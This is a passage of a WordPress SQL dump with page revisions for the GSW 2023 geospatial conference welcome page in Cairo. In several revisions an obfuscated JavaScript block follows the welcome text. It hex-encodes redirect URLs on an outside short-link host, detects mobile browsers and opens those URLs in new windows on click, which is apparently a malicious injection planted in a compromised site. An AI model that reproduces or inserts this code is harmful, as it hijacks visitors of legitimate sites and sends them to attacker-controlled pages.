_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 10:22:09','2023-06-03 10:22:09','',3233,'https://gsw2023.com/?p=4615',0,'revision','',0),
(4616,1,'2023-06-03 10:26:05','2023-06-03 10:26:05','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685787895915{margin-top: -200px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 10:26:05','2023-06-03 10:26:05','',3233,'https://gsw2023.com/?p=4616',0,'revision','',0),
(4617,1,'2023-06-03 10:26:41','2023-06-03 10:26:41','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685787895915{margin-top: -200px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][/vc_column][vc_column width=\"1/3\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 